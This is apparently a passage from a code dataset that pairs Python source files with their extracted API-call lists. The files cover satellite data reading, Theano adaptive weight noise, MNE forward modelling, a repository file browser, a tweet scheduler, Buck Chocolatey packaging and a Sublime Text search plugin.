data['sat_track_azi'] < 270).astype(np.uint8)
flags = {'flagfield_rf1': np.tile(data['flagfield_rf1'], 192),
'flagfield_rf2': np.tile(data['flagfield_rf2'], 192),
'flagfield_pl': np.tile(data['flagfield_pl'], 192),
'flagfield_gen1': data['flagfield_gen1'].flatten(),
'flagfield_gen2': data['flagfield_gen2'].flatten()}
data['f_usable'] = set_flags(flags)
data['f_usable'] = data['f_usable'].reshape(-1, 192)
data['swath_indicator'] = np.int8(data['beam_number'].flatten() > 3)
skip_fields = ['utc_localisation-days', 'utc_localisation-milliseconds',
'degraded_inst_mdr', 'degraded_proc_mdr', 'flagfield_rf1',
'flagfield_rf2', 'flagfield_pl', 'flagfield_gen1',
'flagfield_gen2']
gen_fields_lut = {'inc_angle_full': ('inc', np.float32),
'azi_angle_full': ('azi', np.float32),
'sigma0_full': ('sig', np.float32)}
for var_name in skip_fields:
if var_name in data:
data.pop(var_name)
num_cells = data['lat'].shape[1]
    # iterate over a snapshot of the keys, since entries are popped and renamed
    # inside the loop (mutating a dict while iterating over it raises in Python 3)
    for var_name in list(data.keys()):
        if len(data[var_name].shape) == 1:
            data[var_name] = np.repeat(data[var_name], num_cells)
        if len(data[var_name].shape) == 2:
            data[var_name] = data[var_name].flatten()
        if var_name in gen_fields_lut:
            new_name = gen_fields_lut[var_name][0]
            new_dtype = gen_fields_lut[var_name][1]
            data[new_name] = data.pop(var_name).astype(new_dtype)
return data
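# Hedged usage sketch (the filename is a placeholder for an ASCAT SZF Level 1b HDF5 product):
#   szf = AscatL1bHdf5File('ASCA_SZF_1B_example.h5')
#   beams = szf.read(generic=True, to_xarray=True)
#   print(beams['lf'])   # xarray.Dataset for the left-fore antenna beam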
|
[
"h5py.File",
"numpy.datetime64",
"numpy.dtype",
"xarray.Dataset",
"numpy.array",
"numpy.tile",
"numpy.repeat",
"collections.OrderedDict",
"ascat.read_native.eps_native.set_flags"
] |
[((7767, 7786), 'numpy.array', 'np.array', (['[4, 3, 5]'], {}), '([4, 3, 5])\n', (7775, 7786), True, 'import numpy as np\n'), ((8330, 8346), 'ascat.read_native.eps_native.set_flags', 'set_flags', (['flags'], {}), '(flags)\n', (8339, 8346), False, 'from ascat.read_native.eps_native import set_flags\n'), ((5399, 5412), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (5410, 5412), False, 'from collections import OrderedDict\n'), ((8007, 8042), 'numpy.tile', 'np.tile', (["data['flagfield_rf1']", '(192)'], {}), "(data['flagfield_rf1'], 192)\n", (8014, 8042), True, 'import numpy as np\n'), ((8074, 8109), 'numpy.tile', 'np.tile', (["data['flagfield_rf2']", '(192)'], {}), "(data['flagfield_rf2'], 192)\n", (8081, 8109), True, 'import numpy as np\n'), ((8140, 8174), 'numpy.tile', 'np.tile', (["data['flagfield_pl']", '(192)'], {}), "(data['flagfield_pl'], 192)\n", (8147, 8174), True, 'import numpy as np\n'), ((2991, 3025), 'h5py.File', 'h5py.File', (['self.filename'], {'mode': '"""r"""'}), "(self.filename, mode='r')\n", (3000, 3025), False, 'import h5py\n'), ((9160, 9196), 'numpy.repeat', 'np.repeat', (['data[var_name]', 'num_cells'], {}), '(data[var_name], num_cells)\n', (9169, 9196), True, 'import numpy as np\n'), ((4483, 4510), 'numpy.datetime64', 'np.datetime64', (['"""2000-01-01"""'], {}), "('2000-01-01')\n", (4496, 4510), True, 'import numpy as np\n'), ((6332, 6383), 'xarray.Dataset', 'xr.Dataset', (['sub_data'], {'coords': 'coords', 'attrs': 'metadata'}), '(sub_data, coords=coords, attrs=metadata)\n', (6342, 6383), True, 'import xarray as xr\n'), ((7065, 7080), 'numpy.dtype', 'np.dtype', (['dtype'], {}), '(dtype)\n', (7073, 7080), True, 'import numpy as np\n')]
|
'''
Functions similar to blocks.graph
'''
import logging
import numpy
import theano
from theano import tensor
from theano.sandbox.rng_mrg import MRG_RandomStreams
from blocks.config import config
from blocks.bricks.base import Brick, application
from picklable_itertools.extras import equizip
from blocks.graph import ComputationGraph
from collections import OrderedDict
logger = logging.getLogger(__name__)
class NoiseBrick(Brick):
"""
    A brick to hold parameters introduced by adaptive noise.
    For each model parameter, adaptive noise introduces a learned standard
    deviation parameter.
These new parameters will be held by this brick.
Do not use this brick directly! Its main purpose is to hold noise
parameters and to wrap the new cost.
"""
def __init__(self):
super(NoiseBrick, self).__init__(name='adaptive_noise')
self.parameters = []
self.allocated = True
self.initialized = True
@application(inputs=['train_cost', 'model_cost',
'model_prior_mean', 'model_prior_variance'],
outputs=['total_cost'])
def apply(self, application_call, train_cost, model_cost,
model_prior_mean, model_prior_variance):
# We need to add those as auxiliary variables, as they are not
# used to compute the output, and therefore are lost
application_call.add_auxiliary_variable(model_prior_mean.copy(),
name='model_prior_mean')
application_call.add_auxiliary_variable(model_prior_variance.copy(),
name='model_prior_variance')
total_cost = train_cost + model_cost
total_cost.name = 'total_cost'
return total_cost
def __get_name(param):
brick = None
for annotation in param.tag.annotations:
if isinstance(annotation, Brick):
brick = annotation
break
brick_hierarchy = [brick]
while brick_hierarchy[-1].parents:
brick_hierarchy.append(brick_hierarchy[-1].parents[0])
name = "{}.{}".format('/'.join((b.name for b in brick_hierarchy[::-1])),
param.name)
return name
def apply_adaptive_noise(computation_graph,
cost,
variables,
num_examples,
parameters=None,
init_sigma=1e-6,
model_cost_coefficient=1.0,
seed=None,
gradients=None,
):
"""Add adaptive noise to parameters of a model.
Each of the given variables will be replaced by a normal
distribution with learned mean and standard deviation.
A model cost is computed based on the precision of the the distributions
associated with each variable. It is added to the given cost used to
train the model.
See: <NAME> "Practical Variational Inference for Neural Networks",
NIPS 2011
Parameters
----------
computation_graph : instance of :class:`ComputationGraph`
The computation graph.
cost : :class:`~tensor.TensorVariable`
The cost without weight noise. It should be a member of the
computation_graph.
variables : :class:`~tensor.TensorVariable`
Variables to add noise to.
num_examples : int
Number of training examples. The cost of the model is divided by
        the number of training examples; see
        A. Graves, "Practical Variational Inference for Neural Networks"
        for justification.
parameters : list of :class:`~tensor.TensorVariable`
parameters of the model, if gradients are given the list will not
be used. Otherwise, it will be used to compute the gradients
init_sigma : float,
initial standard deviation of noise variables
model_cost_coefficient : float,
the weight of the model cost
seed : int, optional
The seed with which
        :class:`~theano.sandbox.rng_mrg.MRG_RandomStreams` is initialized;
        defaults to ``config.default_seed``.
gradients : dict, optional
Adaptive weight noise introduces new parameters for which new cost
        and gradients must be computed. Unless the gradients parameter is
given, it will use theano.grad to get the gradients
Returns
-------
cost : :class:`~tensor.TensorVariable`
The new cost
computation_graph : instance of :class:`ComputationGraph`
new graph with added noise.
gradients : dict
a dictionary of gradients for all parameters: the original ones
and the adaptive noise ones
noise_brick : :class:~lvsr.graph.NoiseBrick
the brick that holds all noise parameters and whose .apply method
can be used to find variables added by adaptive noise
"""
if not seed:
seed = config.default_seed
rng = MRG_RandomStreams(seed)
try:
cost_index = computation_graph.outputs.index(cost)
except ValueError:
raise ValueError("cost is not part of the computation_graph")
if gradients is None:
if parameters is None:
raise ValueError("Either gradients or parameters must be given")
logger.info("Taking the cost gradient")
gradients = dict(equizip(parameters,
tensor.grad(cost, parameters)))
else:
if parameters is not None:
logger.warn("Both gradients and parameters given, will ignore"
"parameters")
parameters = gradients.keys()
gradients = OrderedDict(gradients)
log_sigma_scale = 2048.0
P_noisy = variables # We will add noise to these
Beta = [] # will hold means, log_stdev and stdevs
P_with_noise = [] # will hold parames with added noise
# These don't change
P_clean = list(set(parameters).difference(P_noisy))
noise_brick = NoiseBrick()
for p in P_noisy:
p_u = p
p_val = p.get_value(borrow=True)
p_ls2 = theano.shared((numpy.zeros_like(p_val) +
numpy.log(init_sigma) * 2. / log_sigma_scale
).astype(dtype=numpy.float32))
p_ls2.name = __get_name(p_u)
noise_brick.parameters.append(p_ls2)
p_s2 = tensor.exp(p_ls2 * log_sigma_scale)
Beta.append((p_u, p_ls2, p_s2))
p_noisy = p_u + rng.normal(size=p_val.shape) * tensor.sqrt(p_s2)
p_noisy = tensor.patternbroadcast(p_noisy, p.type.broadcastable)
P_with_noise.append(p_noisy)
    # compute the prior mean and variance
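    # The single scalar prior N(prior_u, prior_s2) is fitted to the current
    # posteriors: prior_u averages all noisy parameter elements, and prior_s2
    # averages p_s2 + (p_u - prior_u)**2 over the same elements (a maximum-
    # likelihood fit, as in the NIPS 2011 paper cited in the docstring).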
temp_sum = 0.0
temp_param_count = 0.0
for p_u, unused_p_ls2, unused_p_s2 in Beta:
temp_sum = temp_sum + p_u.sum()
temp_param_count = temp_param_count + p_u.shape.prod()
prior_u = tensor.cast(temp_sum / temp_param_count, 'float32')
temp_sum = 0.0
for p_u, unused_ls2, p_s2 in Beta:
temp_sum = temp_sum + (p_s2).sum() + (((p_u-prior_u)**2).sum())
prior_s2 = tensor.cast(temp_sum/temp_param_count, 'float32')
# convert everything to use the noisy parameters
full_computation_graph = ComputationGraph(computation_graph.outputs +
gradients.values())
full_computation_graph = full_computation_graph.replace(
dict(zip(P_noisy, P_with_noise)))
LC = 0.0 # model cost
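    # Accumulate the KL divergence KL(N(p_u, p_s2) || N(prior_u, prior_s2))
    # summed over all noisy parameter elements; this is the 'model cost' of
    # the variational scheme cited in the docstring.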
for p_u, p_ls2, p_s2 in Beta:
LC = (LC +
0.5 * ((tensor.log(prior_s2) - p_ls2 * log_sigma_scale).sum()) +
1.0 / (2.0 * prior_s2) * (((p_u - prior_u)**2) + p_s2 - prior_s2
).sum()
)
LC = LC / num_examples * model_cost_coefficient
train_cost = noise_brick.apply(
full_computation_graph.outputs[cost_index].copy(), LC,
prior_u, prior_s2)
gradients = OrderedDict(
zip(gradients.keys(),
full_computation_graph.outputs[-len(gradients):]))
#
    # Delete the gradients from the computational graph
#
del full_computation_graph.outputs[-len(gradients):]
new_grads = {p: gradients.pop(p) for p in P_clean}
#
# Warning!!!
    # This only works for batch size 1 (we need the sum of squares
    # to equal the square of the sum!)
#
diag_hessian_estimate = {p: g**2 for p, g in gradients.iteritems()}
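    # The loop below assembles gradients for the posterior means and scaled
    # log-variances: the analytic derivative of LC plus the plain data gradient
    # for each mean, and a variance term that uses g**2 as a diagonal Hessian
    # estimate (hence the batch-size-1 warning above).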
for p_u, p_ls2, p_s2 in Beta:
p_grad = gradients[p_u]
p_u_grad = (model_cost_coefficient * (p_u - prior_u) /
(num_examples*prior_s2) + p_grad)
p_ls2_grad = (numpy.float32(model_cost_coefficient *
0.5 / num_examples * log_sigma_scale) *
(p_s2/prior_s2 - 1.0) +
(0.5*log_sigma_scale) * p_s2 * diag_hessian_estimate[p_u]
)
new_grads[p_u] = p_u_grad
new_grads[p_ls2] = p_ls2_grad
return train_cost, full_computation_graph, new_grads, noise_brick
|
[
"theano.tensor.log",
"numpy.zeros_like",
"numpy.log",
"theano.tensor.exp",
"theano.tensor.cast",
"numpy.float32",
"blocks.bricks.base.application",
"theano.tensor.patternbroadcast",
"theano.tensor.grad",
"theano.sandbox.rng_mrg.MRG_RandomStreams",
"theano.tensor.sqrt",
"collections.OrderedDict",
"logging.getLogger"
] |
[((387, 414), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (404, 414), False, 'import logging\n'), ((945, 1065), 'blocks.bricks.base.application', 'application', ([], {'inputs': "['train_cost', 'model_cost', 'model_prior_mean', 'model_prior_variance']", 'outputs': "['total_cost']"}), "(inputs=['train_cost', 'model_cost', 'model_prior_mean',\n 'model_prior_variance'], outputs=['total_cost'])\n", (956, 1065), False, 'from blocks.bricks.base import Brick, application\n'), ((4942, 4965), 'theano.sandbox.rng_mrg.MRG_RandomStreams', 'MRG_RandomStreams', (['seed'], {}), '(seed)\n', (4959, 4965), False, 'from theano.sandbox.rng_mrg import MRG_RandomStreams\n'), ((5634, 5656), 'collections.OrderedDict', 'OrderedDict', (['gradients'], {}), '(gradients)\n', (5645, 5656), False, 'from collections import OrderedDict\n'), ((6860, 6911), 'theano.tensor.cast', 'tensor.cast', (['(temp_sum / temp_param_count)', '"""float32"""'], {}), "(temp_sum / temp_param_count, 'float32')\n", (6871, 6911), False, 'from theano import tensor\n'), ((7059, 7110), 'theano.tensor.cast', 'tensor.cast', (['(temp_sum / temp_param_count)', '"""float32"""'], {}), "(temp_sum / temp_param_count, 'float32')\n", (7070, 7110), False, 'from theano import tensor\n'), ((6343, 6378), 'theano.tensor.exp', 'tensor.exp', (['(p_ls2 * log_sigma_scale)'], {}), '(p_ls2 * log_sigma_scale)\n', (6353, 6378), False, 'from theano import tensor\n'), ((6511, 6565), 'theano.tensor.patternbroadcast', 'tensor.patternbroadcast', (['p_noisy', 'p.type.broadcastable'], {}), '(p_noisy, p.type.broadcastable)\n', (6534, 6565), False, 'from theano import tensor\n'), ((5389, 5418), 'theano.tensor.grad', 'tensor.grad', (['cost', 'parameters'], {}), '(cost, parameters)\n', (5400, 5418), False, 'from theano import tensor\n'), ((6475, 6492), 'theano.tensor.sqrt', 'tensor.sqrt', (['p_s2'], {}), '(p_s2)\n', (6486, 6492), False, 'from theano import tensor\n'), ((8608, 8684), 'numpy.float32', 'numpy.float32', (['(model_cost_coefficient * 0.5 / num_examples * log_sigma_scale)'], {}), '(model_cost_coefficient * 0.5 / num_examples * log_sigma_scale)\n', (8621, 8684), False, 'import numpy\n'), ((6082, 6105), 'numpy.zeros_like', 'numpy.zeros_like', (['p_val'], {}), '(p_val)\n', (6098, 6105), False, 'import numpy\n'), ((6139, 6160), 'numpy.log', 'numpy.log', (['init_sigma'], {}), '(init_sigma)\n', (6148, 6160), False, 'import numpy\n'), ((7510, 7530), 'theano.tensor.log', 'tensor.log', (['prior_s2'], {}), '(prior_s2)\n', (7520, 7530), False, 'from theano import tensor\n')]
|
import conpy, mne # Import required Python modules
# Define source space on average brain, morph to subject
src_avg = mne.setup_source_space('fsaverage', spacing='ico4')
src_sub = mne.morph_source_spaces(src_avg, subject='sub002')
# Discard deep sources
info = mne.io.read_info('sub002-epo.fif') # Read information about the sensors
verts = conpy.select_vertices_in_sensor_range(src_sub, dist=0.07, info=info)
src_sub = conpy.restrict_src_to_vertices(src_sub, verts)
# Create a one-layer BEM model
bem_model = mne.make_bem_model('sub002', ico=4, conductivity=(0.3,))
bem = mne.make_bem_solution(bem_model)
# Make the forward model
trans = 'sub002-trans.fif' # File containing the MRI<->Head transformation
fwd = mne.make_forward_solution(info, trans, src_sub, bem, meg=True, eeg=False)
# Only retain orientations tangential to a sphere approximation of the head
fwd = conpy.forward_to_tangential(fwd)
|
[
"mne.make_forward_solution",
"conpy.restrict_src_to_vertices",
"mne.make_bem_solution",
"mne.setup_source_space",
"conpy.forward_to_tangential",
"mne.make_bem_model",
"mne.io.read_info",
"conpy.select_vertices_in_sensor_range",
"mne.morph_source_spaces"
] |
[((120, 171), 'mne.setup_source_space', 'mne.setup_source_space', (['"""fsaverage"""'], {'spacing': '"""ico4"""'}), "('fsaverage', spacing='ico4')\n", (142, 171), False, 'import conpy, mne\n'), ((182, 232), 'mne.morph_source_spaces', 'mne.morph_source_spaces', (['src_avg'], {'subject': '"""sub002"""'}), "(src_avg, subject='sub002')\n", (205, 232), False, 'import conpy, mne\n'), ((264, 298), 'mne.io.read_info', 'mne.io.read_info', (['"""sub002-epo.fif"""'], {}), "('sub002-epo.fif')\n", (280, 298), False, 'import conpy, mne\n'), ((345, 413), 'conpy.select_vertices_in_sensor_range', 'conpy.select_vertices_in_sensor_range', (['src_sub'], {'dist': '(0.07)', 'info': 'info'}), '(src_sub, dist=0.07, info=info)\n', (382, 413), False, 'import conpy, mne\n'), ((424, 470), 'conpy.restrict_src_to_vertices', 'conpy.restrict_src_to_vertices', (['src_sub', 'verts'], {}), '(src_sub, verts)\n', (454, 470), False, 'import conpy, mne\n'), ((515, 571), 'mne.make_bem_model', 'mne.make_bem_model', (['"""sub002"""'], {'ico': '(4)', 'conductivity': '(0.3,)'}), "('sub002', ico=4, conductivity=(0.3,))\n", (533, 571), False, 'import conpy, mne\n'), ((578, 610), 'mne.make_bem_solution', 'mne.make_bem_solution', (['bem_model'], {}), '(bem_model)\n', (599, 610), False, 'import conpy, mne\n'), ((719, 792), 'mne.make_forward_solution', 'mne.make_forward_solution', (['info', 'trans', 'src_sub', 'bem'], {'meg': '(True)', 'eeg': '(False)'}), '(info, trans, src_sub, bem, meg=True, eeg=False)\n', (744, 792), False, 'import conpy, mne\n'), ((876, 908), 'conpy.forward_to_tangential', 'conpy.forward_to_tangential', (['fwd'], {}), '(fwd)\n', (903, 908), False, 'import conpy, mne\n')]
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import json
from vilya.libs.template import st
from vilya.models.project import CodeDoubanProject
_q_exports = []
class BrowsefilesUI:
_q_exports = ['setting']
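    # _q_exports, _q_access and _q_index are Quixote-style publisher hooks;
    # _q_access runs before dispatch and selects JSON or HTML output from the
    # request's Accept header.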
def __init__(self, proj_name):
self.proj = proj_name
def _q_access(self, request):
if 'json' in request.environ['HTTP_ACCEPT']:
self.output = 'json'
else:
self.output = 'html'
def _q_index(self, request):
project = CodeDoubanProject.get_by_name(self.proj)
user = request.user
path = request.get_form_var('path', '')
rev = request.get_form_var('rev', project.default_branch)
allfiles = project.repo.get_tree(rev, path=path)
allfiles = [_add_file_type_and_warns(f) for f in allfiles]
errors = ''
project_name = self.proj
project = CodeDoubanProject.get_by_name(project_name)
ref = rev
if ref is None:
ref = project.default_branch
branches = project.repo.branches
tags = project.repo.tags
ref_type = 'branch' if ref in branches else 'tag' \
if ref in tags else 'tree'
if self.output == 'json':
return json.dumps(allfiles)
else:
return st('browsefiles.html', **locals())
def _add_file_type_and_warns(node):
code_file_exts = 'py rb c h html mako ptl js css less handlebars coffee sql'.split() # noqa
bad_exts = 'pyc exe'.split()
    node_ext = node['path'].rsplit('.', 1)[1] if '.' in node['path'] else ''
if node['type'] == 'tree':
icon_type = 'directory'
elif node['type'] == 'commit':
icon_type = 'submodule'
elif node_ext in code_file_exts:
icon_type = 'code-file'
else:
icon_type = 'text-file'
node['icon-type'] = icon_type
if node_ext in bad_exts:
node['warn'] = 'bad'
else:
node['warn'] = 'no'
return node
|
[
"json.dumps",
"vilya.models.project.CodeDoubanProject.get_by_name"
] |
[((518, 558), 'vilya.models.project.CodeDoubanProject.get_by_name', 'CodeDoubanProject.get_by_name', (['self.proj'], {}), '(self.proj)\n', (547, 558), False, 'from vilya.models.project import CodeDoubanProject\n'), ((896, 939), 'vilya.models.project.CodeDoubanProject.get_by_name', 'CodeDoubanProject.get_by_name', (['project_name'], {}), '(project_name)\n', (925, 939), False, 'from vilya.models.project import CodeDoubanProject\n'), ((1256, 1276), 'json.dumps', 'json.dumps', (['allfiles'], {}), '(allfiles)\n', (1266, 1276), False, 'import json\n')]
|
from Tweet import Tweet
import schedule
from functools import wraps
from threading import Thread
from time import sleep
def Threaded(function):
'''
Every call of the decorated function will spawn a
daemonized thread. Returns a threading.Thread object.
'''
@wraps(function)
def wrapper(*args, **kwargs):
thread = Thread(target=function, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
return thread
return wrapper
class Scheduler(object):
@staticmethod
@Threaded
def start():
while True:
schedule.run_pending()
sleep(30)
@staticmethod
def add(day, time):
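        # schedule exposes weekdays as attributes, so add('monday', '10:30')
        # behaves like schedule.every().monday.at('10:30').do(Tweet); the
        # __getattribute__ call just picks the weekday dynamically.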
schedule.every().__getattribute__(day).at(time).do(Tweet)
|
[
"schedule.run_pending",
"threading.Thread",
"time.sleep",
"schedule.every",
"functools.wraps"
] |
[((278, 293), 'functools.wraps', 'wraps', (['function'], {}), '(function)\n', (283, 293), False, 'from functools import wraps\n'), ((345, 394), 'threading.Thread', 'Thread', ([], {'target': 'function', 'args': 'args', 'kwargs': 'kwargs'}), '(target=function, args=args, kwargs=kwargs)\n', (351, 394), False, 'from threading import Thread\n'), ((596, 618), 'schedule.run_pending', 'schedule.run_pending', ([], {}), '()\n', (616, 618), False, 'import schedule\n'), ((631, 640), 'time.sleep', 'sleep', (['(30)'], {}), '(30)\n', (636, 640), False, 'from time import sleep\n'), ((692, 708), 'schedule.every', 'schedule.every', ([], {}), '()\n', (706, 708), False, 'import schedule\n')]
|
#!/usr/bin/env python
# Copyright 2018-present Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import glob
import os
import shutil
import subprocess
import sys
import xml.etree.ElementTree as ElemTree
def parse_args(args):
parser = argparse.ArgumentParser(description="Build buck's choco package")
parser.add_argument(
"--license-file",
required=True,
help="The original license file that needs a prefix added",
)
parser.add_argument(
"--verification-txt",
required=True,
help="The verification.txt template used when creating the nupkg",
)
parser.add_argument(
"--version", required=True, help="The version that is being built"
)
parser.add_argument(
"--timestamp", required=True, help="The timestamp when the release was made"
)
parser.add_argument(
"--src-dir",
required=True,
help="The directory with all of the source files in it (nuspec and changelog)",
)
parser.add_argument("--output", required=True, help="where to output the nupkg")
return parser.parse_args(args)
def copy_files(src_dir):
# This gets set by genrule in buck
dest_dir = os.environ["TMP"]
if not dest_dir:
raise Exception("TMP was not set in the environment. It must be configured")
for src in glob.glob(os.path.join(src_dir, "*")):
dest = os.path.join(dest_dir, os.path.basename(src))
shutil.copy(src, dest)
return dest_dir
def update_nuspec(nuspec, changelog, version):
ns = "http://schemas.microsoft.com/packaging/2015/06/nuspec.xsd"
nsurl = "{" + ns + "}"
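    # ElementTree addresses namespaced tags as '{uri}tag'; registering the
    # default namespace keeps the rewritten nuspec free of ns0: prefixes.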
ElemTree.register_namespace("", ns)
root = ElemTree.parse(nuspec)
root.find("./{ns}metadata/{ns}version".format(ns=nsurl)).text = version
with open(changelog, "r") as fin:
root.find("./{ns}metadata/{ns}releaseNotes".format(ns=nsurl)).text = fin.read()
root.write(nuspec)
def build(nuspec, output):
subprocess.check_call(["choco", "pack", nuspec, "--output-directory", os.getcwd()])
os.rename(glob.glob("buck.*.nupkg")[0], output)
def write_license_file(original_license):
dest = "LICENSE.txt"
with open(original_license, "r") as fin, open(dest, "w") as fout:
fout.write("From: https://github.com/facebook/buck/blob/master/LICENSE\n")
fout.write("\n")
fout.write(fin.read())
def write_verification_txt(original_verification_txt, version, timestamp):
dest = "VERIFICATION.txt"
with open(original_verification_txt, "r") as fin, open(dest, "w") as fout:
verification_text = fin.read().decode("utf-8")
verification_text = verification_text.format(
release_version=version, release_timestamp=timestamp
)
fout.write(verification_text)
if __name__ == "__main__":
args = parse_args(sys.argv[1:])
tmp_dir = copy_files(args.src_dir)
os.chdir(tmp_dir)
update_nuspec("buck.nuspec", "CHANGELOG.md", args.version)
write_license_file(args.license_file)
write_verification_txt(args.verification_txt, args.version, args.timestamp)
build("buck.nuspec", args.output)
|
[
"xml.etree.ElementTree.parse",
"xml.etree.ElementTree.register_namespace",
"argparse.ArgumentParser",
"os.path.basename",
"os.getcwd",
"glob.glob",
"os.path.join",
"os.chdir",
"shutil.copy"
] |
[((769, 834), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Build buck\'s choco package"""'}), '(description="Build buck\'s choco package")\n', (792, 834), False, 'import argparse\n'), ((2168, 2203), 'xml.etree.ElementTree.register_namespace', 'ElemTree.register_namespace', (['""""""', 'ns'], {}), "('', ns)\n", (2195, 2203), True, 'import xml.etree.ElementTree as ElemTree\n'), ((2215, 2237), 'xml.etree.ElementTree.parse', 'ElemTree.parse', (['nuspec'], {}), '(nuspec)\n', (2229, 2237), True, 'import xml.etree.ElementTree as ElemTree\n'), ((3426, 3443), 'os.chdir', 'os.chdir', (['tmp_dir'], {}), '(tmp_dir)\n', (3434, 3443), False, 'import os\n'), ((1878, 1904), 'os.path.join', 'os.path.join', (['src_dir', '"""*"""'], {}), "(src_dir, '*')\n", (1890, 1904), False, 'import os\n'), ((1976, 1998), 'shutil.copy', 'shutil.copy', (['src', 'dest'], {}), '(src, dest)\n', (1987, 1998), False, 'import shutil\n'), ((1945, 1966), 'os.path.basename', 'os.path.basename', (['src'], {}), '(src)\n', (1961, 1966), False, 'import os\n'), ((2566, 2577), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2575, 2577), False, 'import os\n'), ((2594, 2619), 'glob.glob', 'glob.glob', (['"""buck.*.nupkg"""'], {}), "('buck.*.nupkg')\n", (2603, 2619), False, 'import glob\n')]
|
import sublime
import sublime_plugin
import os.path
import os
import sys
import inspect
from collections import defaultdict
### Start of fixing import paths
# realpath() with make your script run, even if you symlink it :)
cmd_folder = os.path.realpath(os.path.abspath(os.path.split(inspect.getfile(inspect.currentframe()))[0]))
if cmd_folder not in sys.path:
sys.path.insert(0, cmd_folder)
# use this if you want to include modules from a subforder
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile(inspect.currentframe()))[0], "subfolder")))
if cmd_subfolder not in sys.path:
sys.path.insert(0, cmd_subfolder)
# Info:
# cmd_folder = os.path.dirname(os.path.abspath(__file__)) # DO NOT USE __file__ !!!
# __file__ fails if script is called in different ways on Windows
# __file__ fails if someone does os.chdir() before
# sys.argv[0] also fails because it doesn't not always contains the path
### End of fixing import paths
import searchengines
basedir = os.getcwd()
class SearchInProjectCommand(sublime_plugin.WindowCommand):
# Used to trim lines for the results quick panel. Without trimming Sublime Text
# *will* hang on long lines - often encountered in minified Javascript, for example.
MAX_RESULT_LINE_LENGTH = 1000
def __init__(self, window):
sublime_plugin.WindowCommand.__init__(self, window)
self.last_search_string = ''
pass
def run(self):
self.settings = sublime.load_settings('SearchInProject.sublime-settings')
self.engine_name = self.settings.get("search_in_project_engine")
pushd = os.getcwd()
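        # Temporarily switch to the directory captured at plugin load time so
        # the configured engine module can be imported, then restore the
        # previous working directory.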
os.chdir(basedir)
__import__("searchengines.%s" % self.engine_name)
self.engine = searchengines.__dict__[self.engine_name].engine_class(self.settings)
os.chdir(pushd)
view = self.window.active_view()
selection_text = view.substr(view.sel()[0])
self.window.show_input_panel(
"Search in project:",
not "\n" in selection_text and selection_text or self.last_search_string,
self.perform_search, None, None)
pass
def perform_search(self, text):
if not text:
return
self.last_search_string = text
folders = self.search_folders()
self.common_path = self.find_common_path(folders)
try:
self.results = self.engine.run(text, folders)
if self.results:
self.results = [[result[0].replace(self.common_path.replace('\"', ''), ''), result[1][:self.MAX_RESULT_LINE_LENGTH]] for result in self.results]
self.results.append("``` List results in view ```")
self.window.show_quick_panel(self.results, self.goto_result)
else:
self.results = []
sublime.message_dialog('No results')
except Exception as e:
self.results = []
sublime.error_message("%s running search engine %s:"%(e.__class__.__name__,self.engine_name) + "\n" + str(e))
def goto_result(self, file_no):
if file_no != -1:
if file_no == len(self.results) - 1: # last result is "list in view"
self.list_in_view()
else:
file_name = self.common_path.replace('\"', '') + self.results[file_no][0]
view = self.window.open_file(file_name, sublime.ENCODED_POSITION)
regions = view.find_all(self.last_search_string)
view.add_regions("search_in_project", regions, "entity.name.filename.find-in-files", "circle", sublime.DRAW_OUTLINED)
def list_in_view(self):
self.results.pop()
view = sublime.active_window().new_file()
view.run_command('search_in_project_results',
{'query': self.last_search_string,
'results': self.results,
'common_path': self.common_path.replace('\"', '')})
def search_folders(self):
search_folders = self.window.folders()
if not search_folders:
filename = self.window.active_view().file_name()
if filename:
search_folders = [os.path.dirname(filename)]
else:
search_folders = [os.path.expanduser("~")]
return search_folders
def find_common_path(self, paths):
paths = [path.replace("\"", "") for path in paths]
paths = [path.split("/") for path in paths]
common_path = []
while 0 not in [len(path) for path in paths]:
next_segment = list(set([path.pop(0) for path in paths]))
if len(next_segment) == 1:
common_path += next_segment
else:
break
return "\"" + "/".join(common_path) + "/\""
class SearchInProjectResultsCommand(sublime_plugin.TextCommand):
def format_result(self, common_path, filename, lines):
lines_text = "\n".join([" %s: %s" % (location, text) for location, text in lines])
return "%s%s:\n%s\n" % (common_path, filename, lines_text)
def format_results(self, common_path, results, query):
grouped_by_filename = defaultdict(list)
for result in results:
filename, location = result[0].split(':', 1)
text = result[1]
grouped_by_filename[filename].append((location, text))
line_count = len(results)
file_count = len(grouped_by_filename)
file_results = [self.format_result(common_path, filename, grouped_by_filename[filename]) for filename in grouped_by_filename]
return ("Search In Project results for \"%s\" (%u lines in %u files):\n\n" % (query, line_count, file_count)) \
+ "\n".join(file_results)
def run(self, edit, common_path, results, query):
self.view.set_name('Find Results')
self.view.set_scratch(True)
self.view.set_syntax_file('Packages/Default/Find Results.hidden-tmLanguage')
results_text = self.format_results(common_path, results, query)
self.view.insert(edit, self.view.text_point(0,0), results_text)
self.view.sel().clear()
self.view.sel().add(sublime.Region(0,0))
|
[
"sublime.message_dialog",
"sublime_plugin.WindowCommand.__init__",
"os.getcwd",
"os.path.dirname",
"sublime.Region",
"sys.path.insert",
"collections.defaultdict",
"sublime.active_window",
"sublime.load_settings",
"inspect.currentframe",
"os.path.expanduser",
"os.chdir"
] |
